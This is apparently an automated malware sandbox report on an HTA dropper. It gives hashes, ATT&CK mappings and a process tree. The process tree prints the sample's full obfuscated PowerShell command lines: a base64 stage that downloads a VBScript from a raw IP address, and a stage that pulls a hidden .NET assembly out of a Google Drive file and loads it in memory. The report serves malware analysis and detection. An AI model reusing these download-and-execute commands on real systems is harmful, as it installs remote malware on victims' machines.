8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93

General

Target

greatthingswithmegood.hta
Size

169KB
MD5

d61ef0038de65f697abb0b7a21b499db
SHA1

f8facfa18bf5eeecaa0601e8c1690fe60fe02ff8
SHA256

8762a9dea77db2f44207cc9edbc192f5776f7ac8532440ae60a65f5102f8ec93
SHA512

3ce0e7e8302d6b6c23ea209b07640be3b616306494d065c0293885bed194002f92bc41f4329f18465dd0ad77087afa6ce5a30a585e422f08a017306040986223
SSDEEP

48:4vaw5oZz7eWLB2rQOyeoCKcxyeoCKnAWUSl+WmpCzc/xJUdPePmkee7+SfitTFmE:4vG172ICeC4lw/HwSCirCtgQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

POWeRSHell.eXEpowershell.exe

flow pid process

3 2276 POWeRSHell.eXE
6 3056 powershell.exe
8 3056 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2308 powershell.exe
3056 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRSHell.eXEpowershell.exe

pid process

2276 POWeRSHell.eXE
3044 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2276	POWeRSHell.eXE
6	3056	powershell.exe
8	3056	powershell.exe

pid	process
2308	powershell.exe
3056	powershell.exe

pid	process
2276	POWeRSHell.eXE
3044	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.exeWScript.exepowershell.exepowershell.exemshta.exePOWeRSHell.eXEpowershell.execsc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSHell.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

POWeRSHell.eXEpowershell.exepowershell.exepowershell.exe

pid process

2276 POWeRSHell.eXE
3044 powershell.exe
2276 POWeRSHell.eXE
2276 POWeRSHell.eXE
2308 powershell.exe
3056 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2276	POWeRSHell.eXE
3044	powershell.exe
2276	POWeRSHell.eXE
2276	POWeRSHell.eXE
2308	powershell.exe
3056	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

POWeRSHell.eXEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2276	POWeRSHell.eXE
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	3056	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePOWeRSHell.eXEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2608 wrote to memory of 2276	2608	mshta.exe	POWeRSHell.eXE
PID 2608 wrote to memory of 2276	2608	mshta.exe	POWeRSHell.eXE
PID 2608 wrote to memory of 2276	2608	mshta.exe	POWeRSHell.eXE
PID 2608 wrote to memory of 2276	2608	mshta.exe	POWeRSHell.eXE
PID 2276 wrote to memory of 3044	2276	POWeRSHell.eXE	powershell.exe
PID 2276 wrote to memory of 3044	2276	POWeRSHell.eXE	powershell.exe
PID 2276 wrote to memory of 3044	2276	POWeRSHell.eXE	powershell.exe
PID 2276 wrote to memory of 3044	2276	POWeRSHell.eXE	powershell.exe
PID 2276 wrote to memory of 2712	2276	POWeRSHell.eXE	csc.exe
PID 2276 wrote to memory of 2712	2276	POWeRSHell.eXE	csc.exe
PID 2276 wrote to memory of 2712	2276	POWeRSHell.eXE	csc.exe
PID 2276 wrote to memory of 2712	2276	POWeRSHell.eXE	csc.exe
PID 2712 wrote to memory of 2792	2712	csc.exe	cvtres.exe
PID 2712 wrote to memory of 2792	2712	csc.exe	cvtres.exe
PID 2712 wrote to memory of 2792	2712	csc.exe	cvtres.exe
PID 2712 wrote to memory of 2792	2712	csc.exe	cvtres.exe
PID 2276 wrote to memory of 1740	2276	POWeRSHell.eXE	WScript.exe
PID 2276 wrote to memory of 1740	2276	POWeRSHell.eXE	WScript.exe
PID 2276 wrote to memory of 1740	2276	POWeRSHell.eXE	WScript.exe
PID 2276 wrote to memory of 1740	2276	POWeRSHell.eXE	WScript.exe
PID 1740 wrote to memory of 2308	1740	WScript.exe	powershell.exe
PID 1740 wrote to memory of 2308	1740	WScript.exe	powershell.exe
PID 1740 wrote to memory of 2308	1740	WScript.exe	powershell.exe
PID 1740 wrote to memory of 2308	1740	WScript.exe	powershell.exe
PID 2308 wrote to memory of 3056	2308	powershell.exe	powershell.exe
PID 2308 wrote to memory of 3056	2308	powershell.exe	powershell.exe
PID 2308 wrote to memory of 3056	2308	powershell.exe	powershell.exe
PID 2308 wrote to memory of 3056	2308	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithmegood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Windows\SysWOW64\windOWSPowerShell\V1.0\POWeRSHell.eXE
  "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_0th7eoa.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC889.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2792
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2308
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES88A.tmp

Filesize
1KB

MD5
1b6ed0be8a713b68e85bef96b588153e

SHA1
6c00a159afc31259931034fba3b34c78d88e61fd

SHA256
5c97bd8b5807ec2b8bd322a6ec06108979d1f97def7fae5a1b2f017e04332542

SHA512
09c1e0c806631c18f7b4c7cff25a13472e6ee0d4bd2d217787033577ac465265221bf6ed75351bb49010e4e12258cc9ccdd57c72a8b8caefe9de91ef976602cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_0th7eoa.dll

Filesize
3KB

MD5
b3c012dcb1fe9c3b557c6d994b172c65

SHA1
ea0e832bcc203abd17d03817809066f8c024f30b

SHA256
0706963d4e43097a5694ca261ccde9fd5ec0699095652779c92cfaf03efdea3e

SHA512
8b620c5157b57378f89424c79fb4296f984fbdaa7b81fef97606768fd2778b0d59846465063607dc06e3f5f998ad6857e7792b446eab37f67b67470ec2c42094

Download Submit
C:\Users\Admin\AppData\Local\Temp\_0th7eoa.pdb

Filesize
7KB

MD5
591e095fbd0ddc938e1ec896c1d9d277

SHA1
51a9f67e311108f66df5dc967546158992f47487

SHA256
7b80486f5356e7c294f6b9ed9b328b054139e656f2fe9fafe245e257bee478e8

SHA512
a9ff902c1feab0f996d6c78bd87ca2fc12d80228fae8f17ef559e30a6f93f594a3c87b85929fa686a94dc84f74a338c92d49c48abcfd5febad06dc9fd4b61d14

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
64e56e1593feaf351b31ee4fe1505e96

SHA1
80422ac5cb70fc08df7143a382dd055d5db134c9

SHA256
ff80ed35e241ba8c384d5f3d6dc830551312aa4bb081ba4168d09595facab7df

SHA512
2e70fa7af57a3426f97fec2e72c4f8127dd947ba306d1b54cc180026411a326636950ba3708288ee542789336fd394f453db9af210d38481d98fa215d7053ca4

Download Submit
C:\Users\Admin\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs

Filesize
138KB

MD5
64cc9748329c0e186cacd10d639615e6

SHA1
1291f245b185bd05fb09646b79f284d76e7dc0ff

SHA256
2c5fffa8231f572e3a34b8d4ca675aec062c3accfe661519a28e376605c0479d

SHA512
65ccbfe0223b58675aef7de997229f3ba66be892c851d6cec9018b941f3a5c5cac3c41fbe1878474213293ad25059b06e7ff7f0c4e3320d75a6fa7f071b646ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC889.tmp

Filesize
652B

MD5
d3b474da9beb6e2dd3d386f424a5db97

SHA1
be1b1c25adb21ace2bd9edcef1d9e57b04984cc0

SHA256
ad7e3d9472113d3bf182a1f5f51e7e72f3bb254a90820efec9da43ece7a231b9

SHA512
b3406e644cce69c0ddaeda9adc264c5711f99f7ee335411ea562826c3709f48d343064bc3bfcb605434e4b99575b2569a738e929dcbdf916784617dd90add82f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_0th7eoa.0.cs

Filesize
487B

MD5
8165df8b1b6d49c15b5e65811de25b8c

SHA1
fbe4fe188254b23c8b57b8d1bcd56011a93f34ba

SHA256
063172ff26517cdf762b144b713c24d423f75c6493234773c0e241c060dfa9f9

SHA512
ede5171453ece61e25baf3eef0a842e92a2b2c47c06bd4ed416f9c0a42e2bbc29f1810b97e4041dcdfd53995fc0e268f20a39188db553cf272b0374994473a2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_0th7eoa.cmdline

Filesize
309B

MD5
8cbb4584ddac1f856aa7ba8002689266

SHA1
bb504f68be0a3d65a27d7f5d0ef74c3bfbe709a5

SHA256
48bcb8d5dc5e95713681571ce91e697433330b34ca80c7c5b8fc8a4c5def9c7b

SHA512
71604f0fc047b478bf7c43a3d6098435e2bb22d4ff3d0648b1e3460ab75fec0efb06b3e6a5230c24b366c9b266e3e6bb30c7ac1ac2a23d5915b4b64dbd99f638

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads